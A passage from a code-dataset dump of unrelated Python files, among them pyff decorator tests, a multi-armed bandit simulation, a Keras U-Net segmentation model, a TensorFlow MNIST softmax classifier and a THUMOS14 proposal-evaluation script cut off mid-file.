list.\"\r\n else:\r\n add_data = VsFavourite(Subscribe=get_video_ins.Created_By,VsUser=get_user_ins,Video=get_video_ins)\r\n add_data.save()\r\n status = \"0\"\r\n message = \"Video add in your favourite list.\"\r\n return JsonResponse({\"status\":status,\"message\":message})","sub_path":"favourite_videos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"324452048","text":"import logging\nfrom six import StringIO\nfrom time import sleep\nfrom unittest import TestCase, skip\n\nfrom mock import patch\n\nfrom pyff.decorators import retry, deprecated, cached\n\n\nclass Logger():\n def __init__(self):\n self.messages = []\n\n def warn(self, message):\n self.messages.append((logging.WARNING, message))\n\n\nclass TestRetry(TestCase):\n\n def test_retry_nop(self):\n status = [False]\n _logger = Logger()\n\n @retry(None, delay=1, backoff=1, logger=_logger)\n def runs_ok():\n status[0] = True\n runs_ok()\n assert(status[0])\n assert(len(_logger.messages) == 0)\n\n def test_retry_fail(self):\n status = [False]\n _logger = Logger()\n @retry(ValueError, delay=1, backoff=1, logger=_logger)\n def fails():\n raise ValueError(\"nope\")\n\n try:\n fails()\n assert False\n except ValueError as ex:\n assert(len(_logger.messages) == 3)\n pass\n assert(not status[0])\n\n def test_retry_fail_stdout(self):\n status = [False]\n @retry(ValueError, delay=1, backoff=1, logger=None)\n def fails():\n raise ValueError(\"nope\")\n\n with patch('sys.stdout', new=StringIO()) as mock_stdout:\n try:\n fails()\n assert False\n except ValueError as ex:\n assert(len(mock_stdout.getvalue().split(\"\\n\")) == 4)\n pass\n assert(not status[0])\n\n\nclass TestDeprecated(TestCase):\n\n def test_deprecate(self):\n\n _logger = Logger()\n\n @deprecated(logger=_logger)\n def test():\n pass\n\n assert(len(_logger.messages) == 0)\n test()\n assert(len(_logger.messages) == 1)\n assert('Call to deprecated function' in _logger.messages[0][1])\n assert(_logger.messages[0][0] == logging.WARNING)\n\n def test_deprecate_stdout(self):\n\n @deprecated(logger=None)\n def old_stuff():\n pass\n\n with patch('sys.stdout', new=StringIO()) as mock_stdout:\n old_stuff()\n assert('Call to deprecated function' in mock_stdout.getvalue())\n\n\nclass TestCached(TestCase):\n\n def setUp(self):\n self.counter = 0\n\n @cached(ttl=2)\n def next_counter(self, info=\"nothing\"):\n self.counter += 1\n self.info = info\n return self.counter\n\n def test_cached_simple(self):\n assert (self.counter == 0)\n assert (self.next_counter() == 1)\n assert (self.next_counter() == 1)\n assert (self.next_counter(info=\"another\") == 2)\n assert (self.counter == 2)\n\n def test_cached_clear(self):\n assert (self.counter == 0)\n assert (self.next_counter() == 1)\n self.next_counter.clear()\n assert (self.counter == 1)\n assert (self.next_counter() == 2)\n\n def test_cached_timeout(self):\n assert (self.counter == 0)\n assert (self.next_counter() == 1)\n print(\"sleeping for 5 seconds...\")\n sleep(5)\n assert (self.counter == 1)\n assert (self.next_counter() == 2)\n\n\nclass TestCachedTyped(TestCase):\n\n def setUp(self):\n self.counter = 0\n\n @cached(ttl=3, typed=True) # long enough time for the test to run ... we hope\n def next_counter(self, info=\"nothing\"):\n self.counter += 1\n self.info = info\n return self.counter\n\n @skip(\"fix later\")\n def test_cached_simple(self):\n assert (self.counter == 0)\n assert (self.next_counter() == 1)\n assert (self.next_counter() == 1)\n assert (self.next_counter.hits() == 1)\n assert (self.next_counter.misses() == 1)\n assert (self.next_counter(info=\"another\") == 2)\n assert (self.counter == 2)\n self.next_counter.invalidate(info=\"another\")\n assert (self.next_counter(info=\"another\") == 3)\n\n def test_cached_clear(self):\n assert (self.counter == 0)\n assert (self.next_counter() == 1)\n self.next_counter.clear()\n assert (self.counter == 1)\n assert (self.next_counter() == 2)\n","sub_path":"src/pyff/test/test_decorators.py","file_name":"test_decorators.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"304151900","text":"from tests.game_tests import GameTests\n\n\nclass A:\n @classmethod\n def create(cls):\n print(\"Creating type from: \" + str(cls))\n return A()\n\n def use_var(self):\n print(\"using local instance: \" + str(id(self)))\n\n\na1 = A.create()\na2 = A.create()\n\na1.use_var()\na2.use_var()\n\n\nGameTests.setUpClass()\n\nt1 = GameTests()\nt1.setUp()\nt1.test_can_create_empty_game()\n\nt2 = GameTests()\nt2.setUp()\nt2.test_cell_can_be_played()","sub_path":"10_Unit_testing/app/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"176518065","text":"import subprocess\nimport os\nimport random\n\nf = open('../Data/10/lsc','r')\n\ncharacter = []\nfor i in f:\n\tcharacter.append(i)\n\nfor i in range(len(character)):\n\tcharacter[i] = character[i].split(',')\n\tcharacter[i].pop(-1)\n\tfor j in range(len(character[i])):\n\t\tcharacter[i][j] = int(character[i][j])\n\tsigma = character[i][0]\n\tcharacter[i].pop(0)\n# print(character)\n# print(sigma)\n\nc = len(character[0])-2\nfor k in range(len(character)):\n\n\tc+=1\n\tif character[k][1] == -1:\n\t\tprint(\"{0},{1},-1\".format(sigma,c))\n\t\tcontinue\n\n\n\tmark = [0]*len(character[k])\n\tcycle_number = 1\n\tcycles = []\n\tdef add_cycle(ch,m,pos):\n\t\ttemp = 0\n\t\tcycles.append([])\n\t\tmark[pos] = 1\n\t\tcur = pos\n\t\twhile ch[cur]!= pos:\n\t\t\ttemp+=1\n\t\t\t# print(temp,len(character[k]),cur)\n\t\t\tcycles[-1].append(cur)\n\t\t\tmark[cur] = 1\n\t\t\tcur = ch[cur]\n\t\tcycles[-1].append(cur)\n\t\tmark[cur] = 1\n\n\tfor i in range(1,len(mark)):\n\t\tif mark[i] == 0:\n\t\t\tadd_cycle(character[k],mark,i)\n\n\tprint(\"{0},{1},{2}\".format(sigma,len(character[k])-1,len(cycles)))\n","sub_path":"Code/runscript.py","file_name":"runscript.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"200327136","text":"import numpy as np\nimport csv\nimport random\nimport time\nfrom joblib import Parallel, delayed\n\n\nfrom copy import deepcopy\n\nfrom lib.constants import DEFAULT_FREE_OBS_NUM\nfrom lib.BanditProblemInstance import BanditProblemInstance\n\nfrom lib.bandit.StaticGreedy import StaticGreedy\nfrom lib.bandit.DynamicEpsilonGreedy import DynamicEpsilonGreedy\nfrom lib.bandit.NonBayesianEpsilonGreedy import NonBayesianEpsilonGreedy\nfrom lib.bandit.DynamicGreedy import DynamicGreedy\nfrom lib.bandit.UCB import UCB1WithConstantOne, UCB1WithConstantT\nfrom lib.bandit.ThompsonSampling import ThompsonSampling\nfrom lib.bandit.ExploreThenExploit import ExploreThenExploit\nfrom simulate import getRealDistributionsFromPrior\n\nfrom scipy.stats import bernoulli, beta\n\n\nT = 2001\nN = 1000\nK = 10\nnumCores = 10\n\n'''\nCurrently, realizations are generated and used as follows:\nWe generate FREE_OBS + MAX_WS + T observations.\nThe first FREE_OBS observations are not used in the isolation sim (for now)\nThe next MAX_WS are reserved for the warm start. If a WS < MAX_WS is used then it simply takes WS realizations from this\nThe observations after FREE_OBS + MAX_WS are the realizations used in competition\n'''\n\n\n\nMAX_WARM_START_SIZE = 200 # the max warm start size\nCUR_WARM_START = 20\nnumObs = MAX_WARM_START_SIZE + T + DEFAULT_FREE_OBS_NUM\n\n\nDEFAULT_COMMON_PRIOR = [beta(1, 1) for k in xrange(K)]\n\n\ndef sim(alg, banditDistr, realizations, seed):\n seed = int(seed)\n np.random.seed(seed)\n\n warmStartRealizations = realizations[DEFAULT_FREE_OBS_NUM:CUR_WARM_START+DEFAULT_FREE_OBS_NUM]\n competitionRealizations = realizations[MAX_WARM_START_SIZE + DEFAULT_FREE_OBS_NUM:]\n totalRealizations = warmStartRealizations + competitionRealizations\n\n\n banditProblemInstance = BanditProblemInstance(K, banditDistr, totalRealizations)\n\n banditAlg = alg(banditProblemInstance, DEFAULT_COMMON_PRIOR)\n for t in xrange(T+CUR_WARM_START):\n banditAlg.executeStep(t)\n return (banditAlg.realizedRewardHistory, banditAlg.realizedCumulativeRewardHistory, banditAlg.meanRewardHistory, banditAlg.meanCumulativeRewardHistory, banditProblemInstance.getArmMeans(), banditProblemInstance.getComplexityMetric())\n\ndefault_mean = 0.5\nneedle_in_haystack = [bernoulli(default_mean) for i in xrange(K)]\n\nneedle_in_haystack_50_high = deepcopy(needle_in_haystack)\nneedle_in_haystack_50_high[int(K/2)] = bernoulli(default_mean + 0.2)\n\nheavy_tail_prior = beta(0.6, 0.6)\nheavy_tailed = [bernoulli(heavy_tail_prior.rvs()) for i in xrange(K)]\n\ndef get_needle_in_haystack(starting_mean):\n needle_in_haystack = [bernoulli(starting_mean) for i in xrange(K)]\n needle_in_haystack[int(K/2)] = bernoulli(starting_mean + 0.2)\n return needle_in_haystack\n\nALGS = [DynamicGreedy, ThompsonSampling, DynamicEpsilonGreedy]\nBANDIT_DISTR = {\n 'Heavy Tail': heavy_tail_prior,\n 'Uniform': None,\n 'Needle In Haystack': get_needle_in_haystack(0.5),\n '.5/.7 Random Draw': None\n}\n\n\nWORKING_DIRECTORY = ''\nWORKING_DIRECTORY = '/rigel/home/ga2449/bandits-rl-project/'\n# Algorithm, Arms, Prior, t, n, reward\n\nRESULTS_DIR = WORKING_DIRECTORY + 'results/preliminary_raw_results/'\n\n\nFILENAME = 'preliminary_plots_unified'\nrealizations_name = RESULTS_DIR + FILENAME + '_realizations.csv'\ndist_name = RESULTS_DIR + FILENAME + '_dist.csv'\n\nFIELDNAMES = ['Realized Complexity', 'n', 'True Mean Reputation', 'Realized Reputation', 'Algorithm', 'K', 'Distribution', 't', 'Instantaneous Realized Reward Mean', 'Instantaneous Mean Reward Mean', 'Arm Means']\nsimResults = {}\n\nwith open(RESULTS_DIR + FILENAME + '.csv', 'w') as csvfile:\n with open(realizations_name, 'w') as realiz:\n with open(dist_name, 'w') as dist:\n\n writer = csv.DictWriter(csvfile, fieldnames=FIELDNAMES)\n writer.writeheader()\n for (banditDistrName, banditDistr) in BANDIT_DISTR.iteritems():\n for a in xrange(len(ALGS)):\n simResults[ALGS[a]] = []\n realDistributions = {}\n realizations = {}\n\n dist_writer = csv.writer(dist)\n dist_writer.writerow(['Prior'] + [i for i in xrange(K)])\n\n realization_writer = csv.writer(realiz)\n realization_writer.writerow(['Prior', 't', 'n'] + [i for i in xrange(K)])\n\n for q in xrange(N):\n realDistributions[q] = getRealDistributionsFromPrior(banditDistrName, banditDistr, K)\n realizations[q] = [[realDistributions[q][j].rvs() for j in xrange(len(realDistributions[q]))] for k in xrange(numObs)]\n dist_writer.writerow([banditDistrName] + [realDistributions[q][j].mean() for j in xrange(len(realDistributions[q]))])\n realization_writer.writerows([[banditDistrName, k, q] + [z for z in realizations[q][k]] for k in xrange(numObs)])\n\n\n for a in xrange(len(ALGS)):\n alg = ALGS[a]\n simResults[alg] = Parallel(n_jobs=numCores)(delayed(sim)(alg, realDistributions[j], realizations[j], j+1) for j in xrange(N))\n for t in range(5, T+CUR_WARM_START, 5):\n for (alg, algResult) in simResults.iteritems():\n name = alg.__name__\n for j in xrange(len(algResult)):\n realized_reputation = np.mean(algResult[j][0][max(0,t-100):t])\n true_reputation = np.mean(algResult[j][2][max(0,t-100):t])\n instantaneous_realized = algResult[j][0][t]\n instantaneous_mean = algResult[j][2][t]\n res = {\n 'Algorithm': name,\n 'K': str(K),\n 'n': str(j),\n 'Distribution': banditDistrName,\n 't': str(t),\n 'Instantaneous Realized Reward Mean': instantaneous_realized,\n 'Instantaneous Mean Reward Mean': instantaneous_mean,\n 'Realized Reputation': realized_reputation,\n 'True Mean Reputation': true_reputation,\n 'Realized Complexity': str(algResult[j][5])\n }\n writer.writerow(res)\n\nprint('all done!')\n","sub_path":"simulation_code/isolation_sim.py","file_name":"isolation_sim.py","file_ext":"py","file_size_in_byte":5894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"459734858","text":"# namedTuple -> ? 차이가 뭐지?\nimport math\nfrom collections import namedtuple, Counter, defaultdict\nfrom typing import NamedTuple\n\n# namedtuple 사용 방법\nstudent = namedtuple('Student', ('no', 'name', 'math', 'science', 'cs'))\nclass student2(NamedTuple):\n no: int\n name: str\n math: int\n science: int\n cs: int\n\nstudent = student2(10, 'you', 99, 99, 99)\nprint(student.name)\n\n# entropy - 불확실성의 정도, E() : 모든 경우에 대한 불확실성이다. 즉, 각 사건에 대한 불확실성의 합이다.\n# partitioning 별 entropy 측정\n# defaultdict test\nd = defaultdict(lambda: 0)\nprint(d)\n\n\ndef partition_by(dataset, attr_name):\n partitions = defaultdict(list) # dict 기본값 만듬\n for sample in dataset: # dataset 에서 sample 1개 꺼냄\n key = getattr(sample, attr_name)\n partitions[key].append(sample)\n return partitions\n\n\ndef class_probabilities(labels): # class 들의 확률을 구해주는 함수\n total_count = len(labels) # 전체 갯수\n counts = Counter(labels) # collection 의 Counter\n print(counts)\n probabilities = [] # 집어넣을 확률 정하기\n for count in counts.values(): # value 만 빼냈다\n p = count / total_count # 확률을 구해주었다.\n probabilities.append() # 각 value 의 확률 리스트에 더함\n return probabilities\n\n\ndef uncertainty(p):\n return -p * math.log(p, 2)\n\n\ndef entropy(class_probabilities):\n ent = 0\n for p in class_probabilities:\n if p != 0:\n ent += uncertainty(p)\n return ent\n\n\ndef partition_entropy_by(dataset, by_partition, by_entropy):\n partitions = partition_by(dataset, by_partition) # partitioning\n labels = []\n for partition in partitions.values():\n values = []\n for sample in partition:\n values.append(getattr(sample, by_entropy))\n labels.append(values)\n print(labels)\n total_count = sum(len(label) for label in labels)\n ent = 0\n for label in labels:\n cls_prob = class_probabilities(label)\n part_ent = entropy(cls_prob)\n ent += part_ent * len(label) / total_count\n return ent\n\n\ndef user_input():\n while True:\n try:\n try:\n n = int(input('1, 2, 3 input your number'))\n except ValueError:\n raise ValueError('no string')\n if n in (1, 2, 3):\n return n\n else:\n raise ValueError('no string')\n except ValueError as e:\n print(e.args)\n\nuser = user_input()\nprint('입력값 =', user)\n\n\n\n\n\n\n","sub_path":"scratch15/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"615762019","text":"## Script (Python) \"guard_edit_sample\"\n##bind container=container\n##bind context=context\n##bind namespace=\n##bind script=script\n##bind subpath=traverse_subpath\n##parameters=\n##title=\n##\n\nwf_tool = context.portal_workflow\n\n# Can't edit the sample if it's cancelled or any analysis has been verified\nif wf_tool.getInfoFor(context, 'cancellation_state') == \"cancelled\":\n return False\nelse:\n ars = context.getAnalysisRequests()\n for ar in ars:\n for a in ar.getAnalyses():\n if wf_tool.getInfoFor(a.getObject(), 'review_state') in ('verified', 'published'):\n return False\n\nreturn True\n\n","sub_path":"bika/lims/skins/bika/guard_edit_sample.py","file_name":"guard_edit_sample.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"241859807","text":"from keras.models import *\r\nfrom keras.layers import *\r\nfrom keras.optimizers import *\r\nfrom keras import backend as K\r\nimport tensorflow as tf\r\n\r\ndef unet(pretrained_weights=None, input_size=(512, 512, 3), num_class=2):\r\n\t\r\n\r\n\tdef iou(y_true, y_pred, label):\r\n\t\t\"\"\"\r\n\t\tReturn the Intersection over Union (IoU) for a given label.\r\n\t\tArgs:\r\n\t\t\ty_true: the expected y values as a one-hot\r\n\t\t\ty_pred: the predicted y values as a one-hot or softmax output\r\n\t\t\tlabel: the label to return the IoU for\r\n\t\tReturns:\r\n\t\t\tthe IoU for the given label\r\n\t\t\"\"\"\r\n\t\t# extract the label values using the argmax operator then\r\n\t\t# calculate equality of the predictions and truths to the label\r\n\t\ty_true = K.cast(K.equal(K.argmax(y_true), label), K.floatx())\r\n\t\ty_pred = K.cast(K.equal(K.argmax(y_pred), label), K.floatx())\r\n\t\t# calculate the |intersection| (AND) of the labels\r\n\t\tintersection = K.sum(y_true * y_pred)\r\n\t\t# calculate the |union| (OR) of the labels\r\n\t\tunion = K.sum(y_true) + K.sum(y_pred) - intersection\r\n\t\t# avoid divide by zero - if the union is zero, return 1\r\n\t\t# otherwise, return the intersection over union\r\n\t\treturn K.switch(K.equal(union, 0), 1.0, intersection / union)\r\n\r\n\tdef mean_iou(y_true, y_pred):\r\n\t\t\"\"\"\r\n\t\tReturn the Intersection over Union (IoU) score.\r\n\t\tArgs:\r\n\t\t\ty_true: the expected y values as a one-hot\r\n\t\t\ty_pred: the predicted y values as a one-hot or softmax output\r\n\t\tReturns:\r\n\t\t\tthe scalar IoU value (mean over all labels)\r\n\t\t\"\"\"\r\n\t\t# get number of labels to calculate IoU for\r\n\t\tnum_labels = K.int_shape(y_pred)[-1]\r\n\t\t# initialize a variable to store total IoU in\r\n\t\ttotal_iou = K.variable(0)\r\n\t\t# iterate over labels to calculate IoU for\r\n\t\tfor label in range(num_labels):\r\n\t\t\ttotal_iou = total_iou + iou(y_true, y_pred, label)\r\n\t\t# divide total IoU by number of labels to get mean IoU\r\n\t\treturn total_iou / num_labels\r\n\t\r\n\tdef iou_loss_score(true, pred): # this can be used as a loss if you make it negative\r\n\t\t# https://www.kaggle.com/c/tgs-salt-identification-challenge/discussion/63044\r\n\t\tintersection = true * pred\r\n\t\tnotTrue = 1 - true\r\n\t\tunion = true + (notTrue * pred)\r\n\r\n\t\treturn -(K.sum(intersection, axis=-1) + K.epsilon()) / (K.sum(union, axis=-1) + K.epsilon())\r\n\t\r\n\tinputs = Input(input_size)\r\n\tredux = 4\r\n\t\r\n\tconv1 = Conv2D(64//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(inputs)\r\n\tconv1 = Conv2D(64//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv1)\r\n\tpool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\r\n\t\r\n\tconv2 = Conv2D(128//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool1)\r\n\tconv2 = Conv2D(128//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv2)\r\n\tpool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\r\n\t\r\n\tconv3 = Conv2D(256//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool2)\r\n\tconv3 = Conv2D(256//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv3)\r\n\tpool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\r\n\t\r\n\tconv4 = Conv2D(512//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool3)\r\n\tconv4 = Conv2D(512//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv4)\r\n\tdrop4 = Dropout(0.5)(conv4)\r\n\tpool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\r\n\r\n\t# conv5 = Conv2D(1024//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool4)\r\n\t# conv5 = Conv2D(1024//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv5)\r\n\t# drop5 = Dropout(0.5)(conv5)\r\n\r\n\tconv5 = Conv2D(512//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool4)\r\n\tconv5 = Conv2D(512//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv5)\r\n\tdrop5 = Dropout(0.5)(conv5)\r\n\r\n\tup6 = Conv2D(512//redux, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\r\n\t\tUpSampling2D(size=(2, 2))(drop5)\r\n\t)\r\n\r\n\tmerge6 = concatenate([drop4, up6], axis=3)\r\n\tconv6 = Conv2D(512//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge6)\r\n\tconv6 = Conv2D(512//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv6)\r\n\r\n\tup7 = Conv2D(256//redux, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\r\n\t\tUpSampling2D(size=(2, 2))(conv6)\r\n\t)\r\n\tmerge7 = concatenate([conv3, up7], axis=3)\r\n\tconv7 = Conv2D(256//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge7)\r\n\tconv7 = Conv2D(256//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv7)\r\n\r\n\tup8 = Conv2D(128//redux, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\r\n\t\tUpSampling2D(size=(2, 2))(conv7)\r\n\t)\r\n\tmerge8 = concatenate([conv2, up8], axis=3)\r\n\tconv8 = Conv2D(128//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge8)\r\n\tconv8 = Conv2D(128//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv8)\r\n\r\n\tup9 = Conv2D(64//redux, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\r\n\t\tUpSampling2D(size=(2, 2))(conv8)\r\n\t)\r\n\r\n\tmerge9 = concatenate([conv1, up9], axis=3)\r\n\tconv9 = Conv2D(64//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge9)\r\n\tconv9 = Conv2D(64//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)\r\n\tconv9 = Conv2D(64//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)\r\n\t\r\n\tif num_class == 2:\r\n\t\tconv10 = Conv2D(1, 1, activation='sigmoid')(conv9)\r\n\t\tloss_function = 'binary_crossentropy'\r\n\telse:\r\n\t\tconv10 = Conv2D(num_class, 1, activation='softmax')(conv9)\r\n\t\tloss_function = 'categorical_crossentropy'\r\n\t\t# https://stackoverflow.com/questions/45799474/keras-model-evaluate-vs-model-predict-accuracy-difference-in-multi-class-nlp-ta/45834857#45834857\r\n\t\t# https://stackoverflow.com/questions/42081257/keras-binary-crossentropy-vs-categorical-crossentropy-performance\r\n\t\r\n\tmodel = Model(input=inputs, output=conv10)\r\n\t# model.compile(optimizer=Adam(lr=1e-4), loss=loss_function, metrics=[\"accuracy\"])\r\n\t# model.compile(optimizer=Adam(lr=1e-4), loss=iou_loss_score, metrics=[\"accuracy\"]) # no funciona\r\n\t# model.compile(optimizer=SGD(lr=1e-4, nesterov=True), loss=loss_function, metrics=[\"accuracy\"])\r\n\tmodel.compile(optimizer=Adadelta(lr=1.0, decay=0.05), loss=loss_function, metrics=[\"accuracy\"])\r\n\t# model.compile(optimizer=RMSprop(lr=1e-4, decay=0.995), loss=loss_function, metrics=[\"accuracy\"])\r\n\r\n\t# https://www.dlology.com/blog/quick-notes-on-how-to-choose-optimizer-in-keras/\r\n\t\r\n\tmodel.summary()\r\n\r\n\tif (pretrained_weights):\r\n\t\tmodel.load_weights(pretrained_weights)\r\n\r\n\treturn model\r\n","sub_path":"model_v2.py","file_name":"model_v2.py","file_ext":"py","file_size_in_byte":6749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"312095166","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"一个简单的MNIST分类器,一层线性层加softmax实现\n\n@author: winton \n@time: 2017-10-25 11:22 \n\"\"\"\nimport os\nimport sys\n\nimport gflags\n\nimport photinia\nimport tensorflow as tf\nimport numpy as np\n\nfrom examples import mnist\n\n\nclass Model(photinia.Model):\n \"\"\"模型定义\n \"\"\"\n\n def __init__(self,\n name,\n session,\n input_size,\n num_classes):\n \"\"\"模型初始化\n\n :param name: 模型名\n :param session: 使用的tensorflow会话\n :param input_size: 输入维度\n :param num_classes: 类别数\n \"\"\"\n self._input_size = input_size\n self._num_classes = num_classes\n super().__init__(name, session)\n\n def _build(self):\n # 网络模块定义:线性层 --- build\n self._lin = photinia.Linear('LINEAR', self._input_size, self._num_classes)\n # 输入定义\n x = tf.placeholder(dtype=photinia.dtype, shape=[None, self._input_size])\n y_ = tf.placeholder(dtype=photinia.dtype, shape=[None, self._num_classes])\n # 网络结构定义 --- setup\n y = self._lin.setup(x)\n # 损失函数定义, softmax交叉熵函数\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y))\n # accuracy计算\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, photinia.dtype))\n # 设置训练和预测的slot\n self._add_slot(\n 'train',\n outputs=loss,\n inputs=(x, y_),\n updates=tf.train.GradientDescentOptimizer(0.5).minimize(loss)\n )\n self._add_slot(\n 'predict',\n outputs=accuracy,\n inputs=(x, y_)\n )\n\n\nclass DataSource(photinia.DataSource):\n \"\"\"数据源定义\n\n 需要把mnist.py返回的图形矩阵(28x28)拉长成一维向量(784)\n \"\"\"\n def __init__(self, directory):\n self._data = mnist.Data(directory)\n\n @property\n def test_images(self):\n size = self._data.test_images.shape[0]\n return np.reshape(self._data.test_images, newshape=(size, -1))\n\n @property\n def test_labels(self):\n return self._data.test_labels\n\n def next_batch(self, size=0):\n images_batch, labels_batch = self._data.next_batch(size)\n return np.reshape(images_batch, newshape=(size, -1)), labels_batch\n\n\ndef main(flags):\n # 创建数据源对象\n ds = DataSource(flags.directory)\n # tensorflow 配置\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n # 开始session\n with tf.Session(config=config) as session:\n # 创建模型对象\n model = Model('Model', session, flags.input_size, flags.num_classes)\n # 获取slot\n train = model.get_slot('train')\n predict = model.get_slot('predict')\n # 参数初始化\n session.run(tf.global_variables_initializer())\n # 开始训练\n for i in range(1, flags.nloop + 1):\n # 获取一个batch的数据\n images_batch, labels_batch = ds.next_batch(flags.bsize)\n # 输出训练交叉熵损失\n loss = train(images_batch, labels_batch)\n print('Loop {}:\\tloss= {}'.format(i, loss))\n # 输出在测试集上的accuracy\n accuracy = predict(ds.test_images, ds.test_labels)\n print('Accuracy on test set: {}'.format(accuracy))\n return 0\n\n\nif __name__ == '__main__':\n global_flags = gflags.FLAGS\n gflags.DEFINE_boolean('help', False, 'Show this help.')\n gflags.DEFINE_string('gpu', '0', 'Which GPU to use.')\n gflags.DEFINE_string('directory', './examples', 'Folder to save the origin data.')\n gflags.DEFINE_integer('input_size', 784, 'Dimension of input data.')\n gflags.DEFINE_integer('num_classes', 10, 'Number of classes.')\n gflags.DEFINE_integer('nloop', 1000, 'Number of loops.')\n gflags.DEFINE_integer('bsize', 100, 'Batch size.')\n global_flags(sys.argv)\n if global_flags.help:\n print(global_flags.main_module_help())\n exit(0)\n os.environ['CUDA_VISIBLE_DEVICES'] = global_flags.gpu\n exit(main(global_flags))\n","sub_path":"examples/mnist_softmax.py","file_name":"mnist_softmax.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"513345285","text":"import os, sys\nproject_root = os.path.join(os.path.expanduser('~'), 'Dev/NetModules')\nsys.path.append(project_root)\nimport matplotlib as mpl\n\nmpl.use('Agg')\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport progressbar\nfrom ActionLocalizationDevs.PropEval.obselete import prop_eval_utils_mod as prop_eval_utils\n\n\n#\n# prediction_file = '/home/zwei/Dev/NetModules/ActionLocalizationDevs/PropEval/pkl_files/TURN-C3D-16_thumos14.pkl'\n# ground_truth_file = '/home/zwei/Dev/NetModules/ActionLocalizationDevs/PropEval/thumos14_test_groundtruth.csv'\n\n\n\ndef pkl_seconds2dataframe(frm_nums):\n data_frame = []\n # movie_fps = pickle.load(open(\"./movie_fps.pkl\"))\n # pkl_dir = \"./pkl_files/\"\n dt_results = pickle.load(open(prediction_file))\n pbar = progressbar.ProgressBar(max_value=len(dt_results))\n for i, _key in enumerate(dt_results):\n pbar.update(i)\n # fps = movie_fps[_key]\n frm_num = frm_nums[_key]\n for line in dt_results[_key]:\n start = int(line[0] * 30)\n end = int(line[1] * 30)\n score = float(line[2])\n data_frame.append([end, start, score, frm_num, _key])\n return data_frame\n\ndef pkl_frame2dataframe(frm_nums):\n data_frame = []\n # movie_fps = pickle.load(open(\"./movie_fps.pkl\"))\n # pkl_dir = \"./pkl_files/\"\n dt_results = pickle.load(open(prediction_file))\n pbar = progressbar.ProgressBar(max_value=len(dt_results))\n for i, _key in enumerate(dt_results):\n pbar.update(i)\n # fps = movie_fps[_key]\n frm_num = frm_nums[_key]\n for line in dt_results[_key]:\n start = int(line[0])\n end = int(line[1])\n score = float(line[2])\n data_frame.append([end, start, score, frm_num, _key])\n return data_frame\n\n\n# save_name = 'lstm2heads_0291'\nsave_name = 'TURN-FLOW-16'\nfreq=0.2\nframebased = False\n\nprediction_file = '/home/zwei/Dev/NetModules/ActionLocalizationDevs/PropEval/pkl_files/{:s}_thumos14.pkl'.format(save_name)\nground_truth_file = '/home/zwei/Dev/NetModules/ActionLocalizationDevs/PropEval/thumos14_test_groundtruth.csv'\nfrm_nums = pickle.load(open(\"./frm_num.pkl\"))\nif framebased:\n rows = pkl_frame2dataframe(frm_nums)\n\nelse:\n rows = pkl_seconds2dataframe(frm_nums)\n\ndaps_results = pd.DataFrame(rows, columns=['f-end', 'f-init', 'score', 'video-frames', 'video-name'])\n\n# Retrieves and loads Thumos14 test set ground-truth.\n# ground_truth_url = ('https://gist.githubusercontent.com/cabaf/'\n# 'ed34a35ee4443b435c36de42c4547bd7/raw/'\n# '952f17b9cdc6aa4e6d696315ba75091224f5de97/'\n# 'thumos14_test_groundtruth.csv')\n# s = requests.get(ground_truth_url).content\nground_truth = pd.read_csv(ground_truth_file, sep=' ')\n# Computes average recall vs average number of 